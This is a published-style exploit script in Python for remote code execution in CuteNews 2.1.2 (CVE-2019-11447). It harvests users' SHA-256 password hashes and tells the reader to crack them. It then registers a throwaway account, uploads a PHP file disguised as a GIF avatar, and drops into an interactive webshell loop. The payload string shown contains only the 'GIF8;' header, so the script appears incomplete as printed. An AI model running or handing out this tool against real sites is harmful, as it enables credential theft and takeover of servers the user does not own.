# Exploit Title: CuteNews 2.1.2 - Remote Code Execution # Google Dork: N/A # Date: 2020-09-10 # Exploit Author: Musyoka Ian # Vendor Homepage: https://cutephp.com/cutenews/downloading.php # Software Link: https://cutephp.com/cutenews/downloading.php # Version: CuteNews 2.1.2 # Tested on: Ubuntu 20.04, CuteNews 2.1.2 # CVE : CVE-2019-11447 #! /bin/env python3 import requests from base64 import b64decode import io import re import string import random import sys banner = """ _____ __ _ __ ___ ___ ___ / ___/_ __/ /____ / |/ /__ _ _____ |_ | < / |_ | / /__/ // / __/ -_) / -_) |/|/ (_-< / __/_ / / / __/ \___/\_,_/\__/\__/_/|_/\__/|__,__/___/ /____(_)_(_)____/ ___ _________ / _ \/ ___/ __/ / , _/ /__/ _/ /_/|_|\___/___/ """ print (banner) print ("[->] Usage python3 expoit.py") print () sess = requests.session() payload = "GIF8;\n" ip = input("Enter the URL> ") def extract_credentials(): global sess, ip url = f"{ip}/CuteNews/cdata/users/lines" encoded_creds = sess.get(url).text buff = io.StringIO(encoded_creds) chash = buff.readlines() if "Not Found" in encoded_creds: print ("[-] No hashes were found skipping!!!") return else: for line in chash: if "" not in line: credentials = b64decode(line) try: sha_hash = re.search('"pass";s:64:"(.*?)"', credentials.decode()).group(1) print (sha_hash) except: pass def register(): global sess, ip userpass = "".join(random.SystemRandom().choice(string.ascii_letters + string.digits ) for _ in range(10)) postdata = { "action" : "register", "regusername" : userpass, "regnickname" : userpass, "regpassword" : userpass, "confirm" : userpass, "regemail" : f"{userpass}@hack.me" } register = sess.post(f"{ip}/CuteNews/index.php?register", data = postdata, allow_redirects = False) if 302 == register.status_code: print (f"[+] Registration successful with username: {userpass} and password: {userpass}") else: sys.exit() def send_payload(payload): global ip token = sess.get(f"{ip}/CuteNews/index.php?mod=main&opt=personal").text signature_key = re.search('signature_key" value="(.*?)"', token).group(1) signature_dsi = re.search('signature_dsi" value="(.*?)"', token).group(1) logged_user = re.search('disabled="disabled" value="(.*?)"', token).group(1) print (f"signature_key: {signature_key}") print (f"signature_dsi: {signature_dsi}") print (f"logged in user: {logged_user}") files = { "mod" : (None, "main"), "opt" : (None, "personal"), "__signature_key" : (None, f"{signature_key}"), "__signature_dsi" : (None, f"{signature_dsi}"), "editpassword" : (None, ""), "confirmpassword" : (None, ""), "editnickname" : (None, logged_user), "avatar_file" : (f"{logged_user}.php", payload), "more[site]" : (None, ""), "more[about]" : (None, "") } payload_send = sess.post(f"{ip}/CuteNews/index.php", files = files).text print("============================\nDropping to a SHELL\n============================") while True: print () command = input("command > ") postdata = {"cmd" : command} output = sess.post(f"{ip}/CuteNews/uploads/avatar_{logged_user}_{logged_user}.php", data=postdata) if 404 == output.status_code: print ("sorry i can't find your webshell try running the exploit again") sys.exit() else: output = re.sub("GIF8;", "", output.text) print (output.strip()) if __name__ == "__main__": print ("================================================================\nUsers SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN\n================================================================") extract_credentials() print ("================================================================") print() print ("=============================\nRegistering a users\n=============================") register() print() print("=======================================================\nSending Payload\n=======================================================") send_payload(payload) print ()